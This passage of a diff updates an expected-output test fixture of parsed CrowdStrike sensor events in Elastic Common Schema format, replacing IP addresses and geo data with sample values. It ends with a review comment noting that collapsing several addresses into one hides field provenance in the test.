pg_wal/RECOVERYXLOG\",\"TargetProcessId\":\"38911778380590\",\"ImageFileName\":\"/usr/bin/pgbackrest\",\"RGID\":\"119\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2LinV6\",\"RUID\":\"114\",\"ProcessStartTime\":\"1625677535.068\",\"aid\":\"ffffffffcf45409f87ed463b40c368ec\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150633400Z", + "original": 
"{\"ParentProcessId\":\"38911774195823\",\"SourceProcessId\":\"38911774195823\",\"aip\":\"67.43.156.14\",\"SessionProcessId\":\"38911772846634\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"event_platform\":\"Lin\",\"ProcessEndTime\":\"1625677535.102\",\"SVUID\":\"114\",\"ParentBaseFileName\":\"bash\",\"id\":\"ffffffff-1111-11eb-bad4-02690d039c6b\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677535482\",\"ProcessGroupId\":\"9277112078\",\"event_simpleName\":\"ProcessRollup2\",\"RawProcessId\":\"73249\",\"GID\":\"119\",\"ConfigStateHash\":\"1284133626\",\"SVGID\":\"119\",\"MD5HashData\":\"29037cef466fa57f03bd1b2a092c47a4\",\"SHA256HashData\":\"a4f11f04df7aa3ac611dcbdb3e3d934a8f0523ea17b0a41a1809c380efd2d112\",\"ConfigBuild\":\"1007.8.0010912.1\",\"UID\":\"114\",\"CommandLine\":\"pgbackrest --stanza\\u003dmain archive-get 000000020004D51F0000009F pg_wal/RECOVERYXLOG\",\"TargetProcessId\":\"38911778380590\",\"ImageFileName\":\"/usr/bin/pgbackrest\",\"RGID\":\"119\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2LinV6\",\"RUID\":\"114\",\"ProcessStartTime\":\"1625677535.068\",\"aid\":\"ffffffffcf45409f87ed463b40c368ec\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:35.482Z", "kind": "event", "action": "ProcessRollup2", @@ -988,21 +883,12 @@ "direction": "outbound" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.238.3.157", - "vendor": "crowdstrike", - "ip": "208.238.3.157", "serial_number": "ffffffff5a2e420c99f6b6d3a5d9de9b", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011308.1" + "version": "1007.8.0011308.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:03.713Z", "ecs": { 
@@ -1010,20 +896,20 @@ }, "related": { "hosts": [ - "208.238.3.157", + "67.43.156.14", "0:0:0:0:0:0:0:1" ], "hash": [ "1701000200" ], "ip": [ - "208.238.3.157", + "67.43.156.14", "0:0:0:0:0:0:0:1" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465498600Z", - "original": "{\"event_simpleName\":\"NetworkConnectIP6\",\"ContextTimeStamp\":\"1625677503.713\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"17307455014463\",\"RemotePort\":\"0\",\"aip\":\"208.238.3.157\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"41952\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP6LinV5\",\"id\":\"ffffffff-1111-11eb-9d7c-02e8a46f51a5\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff5a2e420c99f6b6d3a5d9de9b\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677503947\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150639700Z", + "original": "{\"event_simpleName\":\"NetworkConnectIP6\",\"ContextTimeStamp\":\"1625677503.713\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"17307455014463\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"41952\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP6LinV5\",\"id\":\"ffffffff-1111-11eb-9d7c-02e8a46f51a5\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff5a2e420c99f6b6d3a5d9de9b\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677503947\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:03.947Z", "kind": "event", "action": "NetworkConnectIP6", 
@@ -1064,21 +950,12 @@
 "preserve_original_event"
 ],
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.24.230.3",
- "vendor": "crowdstrike",
- "ip": "208.24.230.3",
 "serial_number": "ffffffff20bd481a98a3d1f6191047ff",
+ "address": "67.43.156.14",
 "type": "agent",
- "version": "1007.4.0013701.1"
+ "version": "1007.4.0013701.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.14"
 },
 "@timestamp": "2021-07-07T17:05:20.973Z",
 "file": {
@@ -1093,18 +970,18 @@ }, "related": { "hosts": [ - "208.24.230.3" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.24.230.3" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465505600Z", - "original": "{\"event_simpleName\":\"OoxmlFileWritten\",\"ContextTimeStamp\":\"1625677520.973\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365044948432500700\",\"ContextThreadId\":\"0\",\"aip\":\"208.24.230.3\",\"FileIdentifier\":\"0500000100000000000000000000000021b0260000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"OoxmlFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-8ad1-02cfdadef55f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff20bd481a98a3d1f6191047ff\",\"timestamp\":\"1625677521081\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user1/Library/Application Support/Google/DriveFS/110588730849638631570/content_cache/d23/d44/432508\"}", + "ingested": "2021-12-09T13:36:11.150646300Z", + "original": "{\"event_simpleName\":\"OoxmlFileWritten\",\"ContextTimeStamp\":\"1625677520.973\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365044948432500700\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"0500000100000000000000000000000021b0260000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"OoxmlFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-8ad1-02cfdadef55f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff20bd481a98a3d1f6191047ff\",\"timestamp\":\"1625677521081\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user1/Library/Application Support/Google/DriveFS/110588730849638631570/content_cache/d23/d44/432508\"}", "created": "2021-07-07T17:05:21.081Z", "kind": "event", "action": "OoxmlFileWritten", 
@@ -1133,44 +1010,14 @@
 "type": "linux"
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 701,
- "organization": {
- "name": "MCI Communications Services, Inc. d/b/a Verizon Business"
- }
- },
- "address": "208.254.169.254",
 "port": 80,
- "ip": "208.254.169.254"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 701,
- "organization": {
- "name": "MCI Communications Services, Inc. d/b/a Verizon Business"
- }
- },
- "address": "208.230.137.65",
 "port": 59926,
- "ip": "208.230.137.65"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "url": {
 "scheme": "http"
@@ -1179,27 +1026,18 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:YcpozwAVBz67M5acsICvqFK2JB0=",
+ "community_id": "1:XUmTKB40anItSVy47MPGAZ+mJWM=",
 "transport": "tcp",
 "iana_number": "6",
 "direction": "outbound"
 },
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.144.51.215",
- "vendor": "crowdstrike",
- "ip": "208.144.51.215",
 "serial_number": "ffffffffbd064538b214ab0dce8e82c3",
+ "address": "67.43.156.13",
 "type": "agent",
- "version": "1007.8.0011308.1"
+ "version": "1007.8.0011308.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.13"
 },
 "@timestamp": "2021-07-07T17:05:30.308Z",
 "ecs": {
@@ -1207,22 +1045,20 @@ }, "related": { "hosts": [ - "208.144.51.215", - "208.230.137.65", - "208.254.169.254" + "67.43.156.13", + "67.43.156.14" ], "hash": [ "3469235958" ], "ip": [ - "208.144.51.215", - "208.230.137.65", - "208.254.169.254" + "67.43.156.13", + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465512400Z", - "original": "{\"LocalAddressIP4\":\"208.230.137.65\",\"event_simpleName\":\"NetworkConnectIP4\",\"ContextTimeStamp\":\"1625677530.308\",\"ConfigStateHash\":\"3469235958\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"12227094573885\",\"RemotePort\":\"80\",\"aip\":\"208.144.51.215\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"59926\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP4LinV5\",\"id\":\"ffffffff-1111-11eb-b727-028bbe41f38d\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffffbd064538b214ab0dce8e82c3\",\"RemoteAddressIP4\":\"208.254.169.254\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677530841\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150652600Z", + "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"NetworkConnectIP4\",\"ContextTimeStamp\":\"1625677530.308\",\"ConfigStateHash\":\"3469235958\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"12227094573885\",\"RemotePort\":\"80\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"59926\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP4LinV5\",\"id\":\"ffffffff-1111-11eb-b727-028bbe41f38d\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffffbd064538b214ab0dce8e82c3\",\"RemoteAddressIP4\":\"67.43.156.14\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677530841\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:30.841Z", "kind": "event", "action": "NetworkConnectIP4", 
@@ -1248,21 +1084,12 @@
 },
 {
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.231.69.37",
- "vendor": "crowdstrike",
- "ip": "208.231.69.37",
 "serial_number": "ffffffff25b14d4aa96de99e24bad2fa",
+ "address": "67.43.156.14",
 "type": "agent",
- "version": "1007.8.0011611.1"
+ "version": "1007.8.0011611.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.14"
 },
 "@timestamp": "2021-07-07T17:04:53.974Z",
 "os": {
@@ -1273,19 +1100,19 @@ }, "related": { "hosts": [ - "208.231.69.37" + "67.43.156.14" ], "hash": [ "1156120155" ], "ip": [ - "208.231.69.37" + "67.43.156.14" ] }, "event": { "action": "ChannelVersionRequired", - "ingested": "2021-11-22T09:23:55.465519Z", - "original": "{\"ChannelVersion\":\"0\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"1156120155\",\"ChannelDiffStatus\":\"1\",\"aip\":\"208.231.69.37\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"12\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"ChannelVersionRequiredLinV2\",\"id\":\"ffffffff-1111-11eb-b7e0-02332cdcc16d\",\"ErrorCode\":\"0\",\"aid\":\"ffffffff25b14d4aa96de99e24bad2fa\",\"timestamp\":\"1625677493974\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150658800Z", + "original": "{\"ChannelVersion\":\"0\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"1156120155\",\"ChannelDiffStatus\":\"1\",\"aip\":\"67.43.156.14\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"12\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"ChannelVersionRequiredLinV2\",\"id\":\"ffffffff-1111-11eb-b7e0-02332cdcc16d\",\"ErrorCode\":\"0\",\"aid\":\"ffffffff25b14d4aa96de99e24bad2fa\",\"timestamp\":\"1625677493974\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b7e0-02332cdcc16d", "created": "2021-07-07T17:04:53.974Z" }, @@ -1311,9 +1138,24 @@ "type": "linux" }, "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "mac": "6e-9e-e0-1f-6d-7d", - "address": "ff88:1:1:ffff:6c9e:e0ff:fe1f:6d7d", - "ip": "ff88:1:1:ffff:6c9e:e0ff:fe1f:6d7d" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" 
@@ -1322,21 +1164,12 @@
 "preserve_original_event"
 ],
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.203.151.21",
- "vendor": "crowdstrike",
- "ip": "208.203.151.21",
 "serial_number": "ffffffffc9114c1898e79604708955a6",
+ "address": "67.43.156.14",
 "type": "agent",
- "version": "1007.8.0011611.1"
+ "version": "1007.8.0011611.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.14"
 },
 "@timestamp": "2021-07-07T17:05:21.218Z",
 "ecs": {
@@ -1344,20 +1177,20 @@ }, "related": { "hosts": [ - "208.203.151.21", - "ff88:1:1:ffff:6c9e:e0ff:fe1f:6d7d" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "hash": [ "1156120155" ], "ip": [ - "208.203.151.21", - "ff88:1:1:ffff:6c9e:e0ff:fe1f:6d7d" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465525700Z", - "original": "{\"event_simpleName\":\"LocalIpAddressIP6\",\"LocalAddressIP6\":\"ff88:1:1:ffff:6c9e:e0ff:fe1f:6d7d\",\"ConfigStateHash\":\"1156120155\",\"CreationTimeStamp\":\"1625677520.686\",\"aip\":\"208.203.151.21\",\"PhysicalAddress\":\"6e-9e-e0-1f-6d-7d\",\"InterfaceAlias\":\"vethdeb0243\",\"InterfaceIndex\":\"3736\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"InterfaceType\":\"1\",\"name\":\"LocalIpAddressIP6LinV1\",\"id\":\"ffffffff-1111-11eb-92d2-0286f570f8e1\",\"PhysicalAddressLength\":\"6\",\"aid\":\"ffffffffc9114c1898e79604708955a6\",\"timestamp\":\"1625677521218\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150665100Z", + "original": "{\"event_simpleName\":\"LocalIpAddressIP6\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1156120155\",\"CreationTimeStamp\":\"1625677520.686\",\"aip\":\"67.43.156.14\",\"PhysicalAddress\":\"6e-9e-e0-1f-6d-7d\",\"InterfaceAlias\":\"vethdeb0243\",\"InterfaceIndex\":\"3736\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"InterfaceType\":\"1\",\"name\":\"LocalIpAddressIP6LinV1\",\"id\":\"ffffffff-1111-11eb-92d2-0286f570f8e1\",\"PhysicalAddressLength\":\"6\",\"aid\":\"ffffffffc9114c1898e79604708955a6\",\"timestamp\":\"1625677521218\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:21.218Z", "kind": "state", "action": "LocalIpAddressIP6", 
@@ -1383,21 +1216,12 @@
 },
 {
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.169.10.84",
- "vendor": "crowdstrike",
- "ip": "208.169.10.84",
 "serial_number": "ffffffff2d7b4778a73b2cf58d327e42",
+ "address": "67.43.156.13",
 "type": "agent",
- "version": "1007.4.0013701.1"
+ "version": "1007.4.0013701.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.13"
 },
 "@timestamp": "2021-07-07T17:04:40.455Z",
 "os": {
@@ -1408,19 +1232,19 @@ }, "related": { "hosts": [ - "208.169.10.84" + "67.43.156.13" ], "hash": [ "1620585913" ], "ip": [ - "208.169.10.84" + "67.43.156.13" ] }, "event": { "action": "ChannelVersionRequired", - "ingested": "2021-11-22T09:23:55.465532600Z", - "original": "{\"ChannelVersion\":\"0\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"1620585913\",\"ChannelDiffStatus\":\"1\",\"aip\":\"208.169.10.84\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"210\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ChannelVersionRequiredMacV2\",\"id\":\"ffffffff-1111-11eb-8cc5-02c6fb049dd3\",\"ErrorCode\":\"0\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff2d7b4778a73b2cf58d327e42\",\"timestamp\":\"1625677480455\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150671500Z", + "original": "{\"ChannelVersion\":\"0\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"1620585913\",\"ChannelDiffStatus\":\"1\",\"aip\":\"67.43.156.13\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"210\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ChannelVersionRequiredMacV2\",\"id\":\"ffffffff-1111-11eb-8cc5-02c6fb049dd3\",\"ErrorCode\":\"0\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff2d7b4778a73b2cf58d327e42\",\"timestamp\":\"1625677480455\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-8cc5-02c6fb049dd3", "created": "2021-07-07T17:04:40.455Z" }, 
@@ -1445,21 +1269,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.231.69.37", - "vendor": "crowdstrike", - "ip": "208.231.69.37", "serial_number": "fffffffff6e146908cbf31d72b94b626", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011611.1" + "version": "1007.8.0011611.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:40.292Z", "os": { 
@@ -1470,18 +1285,18 @@ }, "related": { "hosts": [ - "208.231.69.37" + "67.43.156.14" ], "hash": [ "1156120155" ], "ip": [ - "208.231.69.37" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465539500Z", - "original": "{\"event_simpleName\":\"SensorHeartbeat\",\"ConfigStateHash\":\"1156120155\",\"NetworkContainmentState\":\"0\",\"aip\":\"208.231.69.37\",\"ConfigIDBase\":\"65994753\",\"SensorStateBitMap\":\"2\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"ConfigurationVersion\":\"10\",\"name\":\"SensorHeartbeatLinV4\",\"ConfigIDPlatform\":\"8\",\"id\":\"ffffffff-1111-11eb-993f-02b8dc387eb5\",\"ConfigIDBuild\":\"11611\",\"aid\":\"fffffffff6e146908cbf31d72b94b626\",\"timestamp\":\"1625677540292\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150677900Z", + "original": "{\"event_simpleName\":\"SensorHeartbeat\",\"ConfigStateHash\":\"1156120155\",\"NetworkContainmentState\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"SensorStateBitMap\":\"2\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"ConfigurationVersion\":\"10\",\"name\":\"SensorHeartbeatLinV4\",\"ConfigIDPlatform\":\"8\",\"id\":\"ffffffff-1111-11eb-993f-02b8dc387eb5\",\"ConfigIDBuild\":\"11611\",\"aid\":\"fffffffff6e146908cbf31d72b94b626\",\"timestamp\":\"1625677540292\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:40.292Z", "kind": "event", "action": "SensorHeartbeat", 
@@ -1529,24 +1344,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-OR", - "city_name": "Gresham", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Oregon", - "location": { - "lon": -122.4167, - "lat": 45.5152 - } - }, - "address": "208.187.110.246", - "vendor": "crowdstrike", - "ip": "208.187.110.246", "serial_number": "ffffffff083845f68a7de3d95cb34361", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:28.570Z", "file": { 
@@ -1562,18 +1365,18 @@ }, "related": { "hosts": [ - "208.187.110.246" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.187.110.246" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465546300Z", - "original": "{\"event_simpleName\":\"JavaClassFileWritten\",\"ContextTimeStamp\":\"1625677528.570\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364783686797112486\",\"ContextThreadId\":\"0\",\"aip\":\"208.187.110.246\",\"FileIdentifier\":\"04000001000000000000000000000000986b480e00000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"JavaClassFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff083845f68a7de3d95cb34361\",\"timestamp\":\"1625677528717\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user2/shopper-one/tooling/teams-plugin/build/classes/kotlin/main/com/instacart/shopper/tooling/TeamsPlugin$apply$$inlined$configure$1.class\"}", + "ingested": "2021-12-09T13:36:11.150684100Z", + "original": "{\"event_simpleName\":\"JavaClassFileWritten\",\"ContextTimeStamp\":\"1625677528.570\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364783686797112486\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"04000001000000000000000000000000986b480e00000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"JavaClassFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff083845f68a7de3d95cb34361\",\"timestamp\":\"1625677528717\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user2/shopper-one/tooling/teams-plugin/build/classes/kotlin/main/com/instacart/shopper/tooling/TeamsPlugin$apply$$inlined$configure$1.class\"}", "created": "2021-07-07T17:05:28.717Z", "kind": "event", "action": "JavaClassFileWritten", 
@@ -1602,24 +1405,9 @@ "type": "macos" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 701, - "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" - } - }, - "address": "208.208.21.205", "port": 443, - "ip": "208.208.21.205" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "source": { "port": 0, @@ -1638,21 +1426,12 @@ "direction": "outbound" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.223.60.11", - "vendor": "crowdstrike", - "ip": "208.223.60.11", "serial_number": "ffffffff96f142f6b2475f3c584ddd80", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:12.700Z", "ecs": { 
@@ -1660,22 +1439,20 @@ }, "related": { "hosts": [ - "208.223.60.11", - "0.0.0.0", - "208.208.21.205" + "67.43.156.14", + "0.0.0.0" ], "hash": [ "1620585913" ], "ip": [ - "208.223.60.11", - "0.0.0.0", - "208.208.21.205" + "67.43.156.14", + "0.0.0.0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465553100Z", - "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkConnectIP4\",\"ContextTimeStamp\":\"1625677512.700\",\"ConfigStateHash\":\"1620585913\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364796317497854624\",\"RemotePort\":\"443\",\"aip\":\"208.223.60.11\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"0\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP4MacV10\",\"id\":\"ffffffff-1111-11eb-9c94-0222a21bbb27\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff96f142f6b2475f3c584ddd80\",\"RemoteAddressIP4\":\"208.208.21.205\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677512892\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150690400Z", + "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkConnectIP4\",\"ContextTimeStamp\":\"1625677512.700\",\"ConfigStateHash\":\"1620585913\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364796317497854624\",\"RemotePort\":\"443\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"0\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP4MacV10\",\"id\":\"ffffffff-1111-11eb-9c94-0222a21bbb27\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff96f142f6b2475f3c584ddd80\",\"RemoteAddressIP4\":\"67.43.156.14\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677512892\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:12.892Z", "kind": "event", "action": "NetworkConnectIP4", 
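Review bot: `related.hosts` and `related.ip` shrink from three entries to two here because the observer address and the remote address were both mapped to `67.43.156.14`, so the expected output no longer shows whether `destination.ip` is populated independently of `observer.ip` — the two fields now only pass the test if they are equal. The same collapse happens in `@@ -2106,22 +1817,20 @@` (three addresses become `67.43.156.14`/`67.43.156.13`) and `@@ -2300,20 +1973,18 @@` (two become one), where `LocalAddressIP4` and `aip` in `event.original` share a value. Using distinct addresses from the supported range for each role in the input log (for instance `.13` for local, `.14` for `aip`, `.15` for remote, then regenerating this expected file) would keep the dedup logic and each field's origin observable. The enclosing event object continues outside the hunk.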
